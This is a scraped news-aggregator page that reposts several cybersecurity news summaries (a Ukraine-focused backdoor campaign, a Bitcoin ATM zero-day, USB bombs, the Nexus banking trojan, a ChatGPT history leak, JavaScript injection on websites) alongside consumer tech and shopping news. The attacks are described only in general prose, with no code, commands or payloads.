New Backdoor Attack Uses Russian-Ukrainian Conflict Phishing Emails

andreasc
-
0
New Backdoor Attack Uses Russian-Ukrainian Conflict Phishing Emails
[ad_1]

The primary targets of this phishing campaign are located in the Ukrainian regions of Crimea, Donetsk, and Lugansk, which were annexed by Russia in 2014.

Threat actors have launched a new spear phishing campaign in which they install a PowerShell-based PowerMagic backdoor and CommonMagic framework, according to a report by Kaspersky’s Global Research and Analysis Team.

The attackers send phishing emails containing malicious documents that lead to the installation of the backdoors. The primary targets of this campaign are located in the Ukrainian regions of Crimea, Donetsk, and Lugansk, which were annexed by Russia in 2014.

The emails are designed around the Russian-Ukrainian conflict, indicating that the attackers may have a specific interest in the regional geopolitical situation.

Russian-Ukrainian Conflict Themed Phishing Emails Used in New Cyber Attack
Example of the phishing email (Image credit: Kaspersky)

Kaspersky researcher Leonid Besverzhenko stated that the campaign is primarily an espionage operation targeting administrative, agricultural, and transportation organizations to steal sensitive data.

The phishing emails contain a URL that directs the victim to a ZIP archive containing a malicious LNK file disguised as a PDF. When the victim launches the file, their network is infiltrated, and PowerMagic establishes a connection with its C2 server using OneDrive and Dropbox folders, triggering infection through CommonMagic, a previously undiscovered “malicious framework.”

The CommonMagic framework includes separate modules for different tasks, such as encryption/decryption, screenshot capturing, and document stealing. It can also use plugins for stealing a wide range of files, including DOC, DOCX, XLS, XLSX, RTF, ODT, ODS, ZIP, RAR, TXT, and PDF from USB devices.

Additionally, it can take screenshots every three seconds by abusing the Windows Graphics Device Interface (GDI) API. Both malware have been in active use since September 2021, and Kaspersky discovered the campaign in October.

However, researchers have not yet been able to associate this campaign with a previously known actor. They do believe that an advanced threat actor is behind this campaign.

  1. Ukraine thwart Russian Industroyer 2 malware attack
  2. 34 Russian hacking gangs stole 50m user passwords
  3. DDoS app meant to hit Russia infected Ukrainian phones
  4. CryWiper disguised as ransomware to hit Russian courts
  5. Data of Millions of Russians & Ukrainians Exposed Online

[ad_2]
Source link

Zero-day spells disaster for Bitcoin ATM

andreasc
-
0
Zero-day spells disaster for Bitcoin ATM
[ad_1]

We look at a $1.5m heist of cryptocurrency via compromised Bitcoin ATMs.

Bitcoin ATMs have experienced a severe bout of cash drain after a zero-day bug was exploited to steal a total of $1.5 million in digital currency. The ATMs, located in various convenience stores, function along the lines of regular banking ATMs except your dealings are all in the cryptocurrency realm.

As Ars Technica notes, a particular feature of the affected ATMs is the ability to upload video. It’s not mentioned what these videos are used for (presumably security cameras), but the master server interface allowing for the video uploads is where things went horribly wrong.

From the General Bytes statement regarding the March 18 incident:

The GENERAL BYTES Cloud service and other standalone servers run by operators suffered security breaches. We noticed the first signs of a break-in on Friday night, right after midnight on Saturday, 18 March (UTC+1). We notified customers to shut down their CAS servers as soon as possible. The attacker could upload his java application remotely via the master service interface used by terminals to upload videos and run it using BATM user privileges. As a result, the attacker could send funds from hot wallets, and at least 56 Bitcoins were stolen before we could release the patch. The patch was released within 15 hours.

To make use of the exploit, the attacker uploaded a custom made application to the ATM application server used by the administration interface. In a nod to the evergreen security tip “Don’t allow things to autorun if you don’t need them to”, the application server allowed applications to start by default.

With this in place, the attacker was able to perform the below:

  • Ability to access the database.
  • Ability to read and decrypt API keys to access funds in hot wallets and exchanges.
  • Send funds from hot wallets.
  • Download user names and their password hashes, and turn off 2FA.
  • Ability to access terminal event logs, which can include private keys at the ATM.

56 bitcoins are currently worth a cool $1.5 million. It is very unlikely all of the stolen coins belonged to one person, but this is scant consolation for anyone affected. For now, General Bytes is collecting information on everyone affected to “validate losses”. It remains to be seen if anyone is able to recover their funds, but losing money in any cryptocurrency scenario is always a very risky business because  they are generally, by design, unable to roll back fraudulent transactions.

Interestingly, the affected company has a call to any security companies and individuals who feel they can assist in making the product safer.

Keeping your hot wallet safe

Your cryptocurrency wallet type is an article all to its own, but in most cases you’re going to have a wallet which is hot or cold. A cold wallet is not connected to the Internet and is therefore the safest possible choice. A hot wallet comes with some form of connectivity built in, which is much more convenient. You’re able to send funds, for example, and engage with cryptocurrency exchanges. In this case, the compromised wallets are considered to be hot. Without this functionality, the ATM would be rather useless for the user’s needs.

You can’t prepare for every eventuality. If an exchange (or, in this case, a connected ATM) is compromised then your funds could still vanish no matter what security plans you have in place. Even so, here’s what you can do from your end to keep things secure.

  • Enable two-factor authentication. If it’s available for your flavour of wallet, then make sure to turn it on. Hardware keys are safest, then authenticator apps, and lastly SMS.
  • Keep your recovery passphrase safe. Never hand over your recovery phrase to any site or individual, this is a common scam deployed by phishers.
  • Be sceptical of airdrops. This is another way to entice potential victims with phishing tactics. As per the above, asking for your recovery phrase is the ultimate aim.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW


[ad_2]
Source link

USB bombs sent to news organizations

andreasc
-
0
USB bombs sent to news organizations
[ad_1]

USB sticks repurposed as explosive devices provide a dramatic reminder of how little you know about unknown USB devices.

We’ve warned about the possible dangers arising from plugging in unknown USB sticks before, but the dangers we’re concerned with are normally confined to your data.

However, this week we learned a far more serious threat. No fewer than five different news agencies in Ecuador were sent parcels containing a USB stick. In the one instance where a stick was plugged into a PC by a journalist, the device exploded, injuring a presenter in the news room. At least one of the devices had been loaded with a “military type explosive“.

Law enforcement is currently investigating, but for now we have to hope that no additional devices were sent out, just waiting to be inserted into a PC. While this scenario is almost guaranteed to be one that you will not face, that doesn’t mean there aren’t USB stick related perils out there in the wild.

A sticky malware threat

Malware authors are big fans of sending out infected USB sticks to potential victims. Just last year, slick looking Microsoft boxes supposedly containing Office 365 loaded onto USB sticks were sent out by tech support scammers. When inserted into a PC, a phone number would appear and callers would find themselves asked to install remote access tools on their devices. Elsewhere, infected USB Sticks came bearing the gift of ransomware.

USB sticks are also easy to lose: Sometimes people find them lying around in the street, full of potentially sensitive data, as opposed some kind of horrible malware.

Our willingness to insert sticks into computers is helped along by USB sticks being a commonplace giveaway at events, conferences, and even a staple of certain performance art pieces. If you have children, your school may well hand out digital copies of school photographs on USB sticks. Many people will insert those sticks into their computer without a second thought because they’re from a trusted source, the school. Even so, the stick is actually from a totally unrelated third party photographer. Can we guarantee that the photographer is following safety rules, if they even exist?

We never really know for sure, and that can be a problem. However, there are a few things you can do to help keep yourself safe from USB harm.

Tips for USB security

  • Don’t autorun files. If Autorun is enabled on your device, it’s time to consider turning it off.
  • Restrict access. If people in your workplace don’t need to use USB sticks, turn off USB access on their devices and block the USB ports.
  • Occasional access. For times when someone needs to use a USB stick, consider using those sticks on a non-networked PC running a virtual machine.
  • Fire up those security tools. Always scan the contents of a USB stick. Your Endpoint Detection and Response should be equipped to deal with USB threats.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW


[ad_2]
Source link

Fans of third-party YouTube apps should watch out for Nexus banking malware

andreasc
-
0
Fans of third-party YouTube apps should watch out for Nexus banking malware
[ad_1]

It first appeared in June last year and is now being openly advertised by its creators on hacker forums to increase its reach. Nexus’ primary targets are 450 banking and cryptocurrency apps. 

It’s being distributed through phishing websites posing as legitimate websites of YouTube Vanced, a discontinued third-party YouTube app. It uses all the tricks in the books to gain your banking info and take over your financial accounts.

Nexus asks for 50 permissions and abuses at least 14 of them

It is capable of performing overlay attacks, i.e. replicating a legitimate interface to trick you into entering your credentials, and uses keylogging to record your keystrokes. It can even steal SMS messages to get access to two-factor authentication codes and can abuse Accessibility Services to steal information from crypto wallets, 2-Step Verification codes generated by Google Authenticator, and website cookies. The trojan can also delete messages received by you.

After it’s installed on a device, Nexus connects to its command-and-control (C2) server. C2s are used by cybercriminals to control malware, launch attacks, and receive stolen data.

Nexus is said to be in the beta stage but it’s already being used by many threat actors to carry out nefarious activities. Cybercriminals who do not know how to make their own malware can rent it for $3,000 a month.

It looks like the developer is from a CIS (Commonwealth of Independent States) country and has prohibited the trojan’s use in Azerbaijan, Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russian Federation, Tajikistan, Uzbekistan, Ukraine, and Indonesia.

Nexus is capable of updating itself and Cleafy thinks it is a real threat and can infect hundreds of Android devices in the world.

To protect yourself from infections, try to only download apps from Google Play and enable Google Play Protect. Use strong passwords and enable biometric security features where possible and be very careful when granting permissions.


[ad_2]
Source link

ChatGPT leaks bits of users’ chat history

andreasc
-
0
ChatGPT leaks bits of users’ chat history
[ad_1]

ChatGPT suddenly started showing users the titles of other users’ chats.

New gadgets and software come with new bugs, especially if they’re rushed. We can see this very clearly in the race between tech giants to push large language models (LLMs) like ChatGPT and its competitors out the door. In the most recently revealed LLM bug, ChatGPT allowed some users to see the titles of other users’ conversations.

LLMs are huge deep-neural-networks, which are trained on the input of billions of pages of written material.

In the words of ChatGPT itself:

“The training process involves exposing the model to vast amounts of text data, such as books, articles, and websites. During training, the model adjusts its internal parameters to minimize the difference between the text it generates and the text in the training data. This allows the model to learn patterns and relationships in language, and to generate new text that is similar in style and content to the text it was trained on.”

We have written before about tricking LLMs in to behaving in ways they aren’t supposed to. We call that jailbreaking. And I’d say that’s fine. It’s all part of what could be seen as a beta-testing phase for these complex new tools. And as long as we report the ways in which we are able to exceed the limitations of the model and give the developers a chance to tighten things up, we’re working together to make the models better.

But, when a model spills information about other users we stumble into an area that should have been sealed off already.

To understand better what has happened, it is necessary to have some basic working knowledge about how these models work. To improve the quality of the responses they get, users can organize the conversations they have with the LLM into a type of thread, so that the model, and the user, can look back and see what ground they have covered and what they are working on.

With ChatGPT, each conversation with the chatbot is stored in the user’s chat history bar where it can be revisited later. This gives the user an opportunity to work on several subjects and keep them organized and separate.

message saying history is unavailable
The history was unavailable for a while

Showing this history to other users would, at the very least, be annoying and unacceptable, because it could be embarrassing or even give away sensitive information.

title of chat says Wife Valentine's Day Gift?
Did I ask ChatGPT what to get my wife for Valentine’s Day?

Nevertheless, this is exactly what happened. At some point, users started noticing items in their history that weren’t their own.

Although OpenAI reassured users that others could not access the actual chats, users were understandably worried about their privacy.

According to an OpenAI spokesperson on Reddit the underlying bug was in an open source library.

post on Reddit by Sam Altman

OpenAI CEO Sam Altman said the company feels “awful”, but the “significant” error has now been fixed.

Things to remember

Giant, interactive LLMs like ChatGPT are still in the early stages of development and, despite what some want us to believe, they are neither the answer to everything nor the end of the world. At this point they are just very limited search engines that rephrase what they found about the subject you asked about, unlike an “old-fashioned” search engine that shows you possible sources of information and you can decide which ones are trustworthy and which ones aren’t.

When you are using any of the LLMs, remind yourself that they are still very much in a testing phase. Which means:

  • Do not feed it private or sensitive information about yourself or your employer. Other leaks are likely and may be even more embarrassing.
  • Take the results with more than just a grain of salt. Because the models don’t provide sources of information, you can’t know where it’s ideas came from.
  • Make yourself familiar with the LLM’s limitations. It helps to understand how up to date the information it uses is and the subjects it can’t converse freely about.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW


[ad_2]
Source link

Hackers Inject Weaponized JavaScript (JS) on 51,000 Websites

andreasc
-
0
Hackers Inject Weaponized JavaScript (JS) on 51,000 Websites
[ad_1]

Researchers from Unit 42 have been monitoring a widespread campaign of harmful JavaScript (JS) injections. The campaign aims to redirect unsuspecting victims to dangerous content, including adware and fraudulent pages.

Websites continue to be infected by this threat in 2023, as it was active throughout 2022. The malicious JS code was discovered on over 51,000 websites, with several hundred appearing in Tranco’s top 1 million ranked websites.

The potential impact of this campaign is significant, as the presence of affected websites in Tranco suggests a widespread reach.

The campaign’s complexity lies in its multi-stage injection process, which precedes redirecting harmful web pages as an additional means of evading detection, obfuscation, and benign append attacks were employed.

EHA

Impact of the campaign on user

Experts have identified multiple versions of a campaign involving malicious JS code injection into websites by threat actors. During the year 2020, the campaign was observed for the first time.

170,000 URLs and 51,000 hostnames have been identified as part of this campaign since its inception in 2022.

A peak of over 4,000 daily URLs was generated as a result of this campaign between May and August 2022. 

The impact of this campaign has been substantial, with hundreds of infected websites appearing in Tranco’s top one million ranked sites, indicating a potentially wide reach among internet users.

In January 2023, approximately 240,000 website sessions were prevented across 14,773 devices due to blocking measures taken against these websites.

Technical analysis

A malicious payload was hidden in the injected JS code, which was obfuscated to bypass detection and remain undetected. A malicious JS is loaded from a URL obscured by the obfuscated code. 

As part of the code, the malicious JS is dynamically added to the DOM structure, which is also included in the code.

On certain websites, obfuscated JS snippets have been found to be injected into commonly used utility JS files, as per observations. Appending malicious code to extensive sections of benign code, also called a benign append attack, is a common tactic malware authors employ.

It can be used by malware authors to avoid detection by security crawlers and remain undetected. In each JS code snippet, the injected JS code appends external malicious JS code through DOM manipulation.

A malicious payload can be changed in this manner, providing the attacker greater flexibility. In its more recent version, this campaign injects malicious JS code into a website for malicious purposes.

Upon executing the final payload, users are redirected to various websites before reaching a destination webpage, often consisting of adware or a fraudulent page.

This page displays false information that may deceive individuals into granting permission for a malicious website to send browser notifications under the control of an attacker.

The researchers at Unit 42 believe that many websites are susceptible to security breaches due to vulnerabilities in one or more CMS plugins.

The researchers at Sucuri have discovered that exactly the same technique was used to exploit CMS plugins in a similar campaign. The threat actors responsible for creating malware have produced multiple variations of the harmful JavaScript code they injected into websites during this campaign.

Detecting different variants of the same attack is a robust characteristic of deep learning techniques often used to detect intrusions.

In order to prevent malicious JS injections, deep learning techniques could be applied to increase the detection rate.

Searching to secure your APIs? – Try Free API Penetration Testing


[ad_2]
Source link

Global versions of Huawei Mate X3 & P60 will launch on May 9

andreasc
-
0
Global versions of Huawei Mate X3 & P60 will launch on May 9
[ad_1]

As many of you know by now, Huawei announced its new flagship offerings yesterday. The Huawei Mate X3 foldable smartphone got announced, alongside three Huawei P60 series devices, and the Huawei Watch Ultimate. Some other devices got presented, but these are the ones that stole the show. Well, Huawei has confirmed that global variants of the Mate X3 and P60 series will be coming on May 9.

Global versions of Huawei Mate X3 & P60 series will launch on May 9

Do note that the company reached out to us to confirm it, we haven’t seen it on Huawei’s social media network channels just yet. The company said that the event will take place in Munich, Germany, though we still don’t know at what time exactly. That confirmation will likely come later on.

Just to be clear, the company said that “overseas versions” of “a number of new products” that launched in China, will be announced during this event. It did not name devices specifically, so do note that.

The Huawei Watch Ultimate was already announced for global markets, at the same time as the event in China yesterday. We already know it will go on sale on March 28, and that it will be quite pricey.

The Huawei Mate X3 has a lot to offer from the design standpoint

More people are probably interested in Huawei’s flagship smartphones, though. The Huawei Mate X3 managed to shock us yesterday, as it was announced as the thinnest book-style foldable, and also one of the lightest large foldables in the market. Well, probably the lightest one.

That’s only scratching the surface, though, as the phone truly does have a lot to offer. The Huawei P60 series is also rather interesting. Huawei opted for a somewhat odd naming scheme these days, by introducing the ‘Art’ model as the highest-end P60 device.

It remains to be seen if all three P60 devices will launch in Europe, or just one or two. The Mate X3 will be coming, almost certainly, so get ready for that.


[ad_2]
Source link

Twitter is removing legacy blue checkmarks as Twitter Blue goes global

andreasc
-
0
Twitter is removing legacy blue checkmarks as Twitter Blue goes global
[ad_1]

Twitter made two big announcements today. Firstly, its premium subscription service Twitter Blue is now available globally. Anyone can pay the company to unlock some extra features and add a blue tick next to their handle. Second, the social network is removing legacy verified checkmarks starting on April 1. Accounts that were verified before Elon Musk took over the company will lose their blue checkmarks unless they subscribe to Twitter Blue.

Both of these changes have been a long-time coming. By a long time, we mean since Twitter changed ownership in late October 2022. Elon Musk made it clear that the company will scrap the existing account verification system and will instead sell the blue tick as part of Twitter Blue, which he sees as a big revenue stream. “The way in which they were given out was corrupt and nonsensical,” the billionaire said about the legacy checkmarks said in December. He repeated the “corrupt” remark last month too.

The first part of the plan was to make Twitter Blue available for everyone before removing the legacy blue ticks. The firm has rapidly expanded the subscription system in recent months, finally bringing it to Android in January this year. Today, the service has gone global. “Twitter Blue is now available globally! Sign up today to get your blue checkmark, prioritized ranking in conversations, half ads, long Tweets, Bookmark Folders, custom navigation, Edit Tweet, Undo Tweet, and more,” Twitter Blue tweeted Thursday afternoon.

Twitter will start removing legacy blue checkmarks on April Fool’s Day

With the subscription service available globally, Twitter has announced the second part of the plan as well. Starting this April Fool’s Day, it will no longer honor the coveted checkmark that users earned after meeting several criteria established by the company. Instead, it is forcing them to buy a Twitter Blue subscription to keep the blue tick. “On April 1st, we will begin winding down our legacy verified program and removing legacy verified checkmarks. To keep your blue checkmark on Twitter, individuals can sign up for Twitter Blue,” Twitter Verified tweeted just hours later.

Twitter Blue costs $8 a month ($11 a month if you subscribe through the Android or iOS app). It gives you everything that the company mentioned in the tweet above. You need to verify your identity with a phone number for the blue tick, though. For governmental and organizational accounts, Twitter has introduced a new grey checkmark. Heads of state, ministers, national-level cabinet members, official spokespersons, company headquarters, regional and country-level institutional accounts, and multilateral individuals are among those eligible for grey checkmarks.


[ad_2]
Source link

OnePlus will launch two new ‘Nord’ devices on April 4

andreasc
-
0
OnePlus will launch two new ‘Nord’ devices on April 4
[ad_1]

OnePlus has confirmed that it will launch two new ‘Nord’ devices on April 4. We already know what products, actually. OnePlus is to blame for that, as it already kind of listed both of them on its website.

OnePlus is planning to launch two ‘Nord’ devices on April 4

The devices in question are the OnePlus Nord CE 3 Lite and the OnePlus Buds 2. OnePlus has already published pictures of both of those devices on its website. The company, however, did not share any other details. We knew about the CE 3 Lite since earlier this month, but the Buds 2 were not confirmed, until now.

These will launch in India, at least at first. They will also be quite affordable, these are ‘Nord’ devices after all. The OnePlus Nord CE 3 Lite will be available in a Pastel Lime color, while the earbuds will sell in Black and White colors. You can check out both devices in the gallery below.

The phone will have two camera islands on the back, hosting three cameras, it would seem. The OnePlus Buds 2, on the other hand, will look basically like the first-gen model. We do expect some improvements on the inside, though, of course.

The phone will include a 120Hz display, 67W charging & a 108MP camera

The company did not share any spec info regarding these products, but the OnePlus Nord CE 3 Lite specs did surface recently. The device will feature a 6.7-inch fullHD+ LCD display, it seems. It will feature a 120Hz refresh rate, by the way.

A 5,000mAh battery was also mentioned, and 67W fast wired charging will be supported. The Snapdragon 695 will fuel the device, while you’ll be able to choose between 6GB and 8GB RAM flavors. Those two models will ship with 128GB and 256GB of internal storage, respectively. Also, the storage will be expandable.

A 108-megapixel main camera will sit on the back. It will be backed by two 2-megapixel units. We still don’t have the details on those. A single 16-megapixel camera will sit on the front.

Android 13 will come pre-installed on the phone, along with OxygenOS 13. You can also expect two SIM card slots to be available. We don’t have the OnePlus Buds 2 details yet.


[ad_2]
Source link

The iRobot Roomba i4+ is on sale for a limited time!

andreasc
-
0
The iRobot Roomba i4+ is on sale for a limited time!
[ad_1]

Today, Amazon has the iRobot Roomba i4+ on sale today for $399. That’s going to save you $250 off of the regular price. That is also the cheapest the Roomba i4+ has ever been. Making this a really great time to pick one up.

That’s a pretty solid price for the Roomba i4+. iRobot claims that the Roomba i4+ is perfect for those that have pets. THat’s because it does not use a single bristle brush. And instead uses the multi-surface rubber brushes that  are able to flex to adjust to different floor types. So why is this good for pets? It doesn’t get pet hair tangled in the brush. Which is a really big deal honestly.

Other than that, the Roomba i4+ also has all of the features that you’d expect from iRobot. That includes voice commands with Google Assistant and Alexa. There’s also schedules available, so you can have your Roomba clean at specific times, on specific days. iRobot claims that it has about 10x the power-lifting suction power when compared to the Roomba 600 series.

This is the plus model, which means that it also comes with the auto-empty dock. So when the iRobot Roomba i4+ docks, it will go ahead and empty the dustbin. Which is very convenient and it can also hold about 60 days worth of debris before it needs to be emptied.

Whether you’re relaxing at home or out enjoying life, the Roomba i4 plus EVO robot vacuum takes care of stubborn dirt and messes with a Premium 3-Stage Cleaning System and 10x the Power-Lifting Suction. Compared to the Roomba 600 series cleaning system. The Roomba i4 plus EVO takes vacuuming off your mind with personalized cleaning suggestions powered by the unique intelligence of iRobot OS. Learns your habits and your routines.

You can pick up the iRobot Roomba i4+ robot vacuum from Amazon today by clicking here.

iRobot Roomba i4+ – Amazon


[ad_2]
Source link
1...1,3361,3371,338...1,452Page 1,337 of 1,452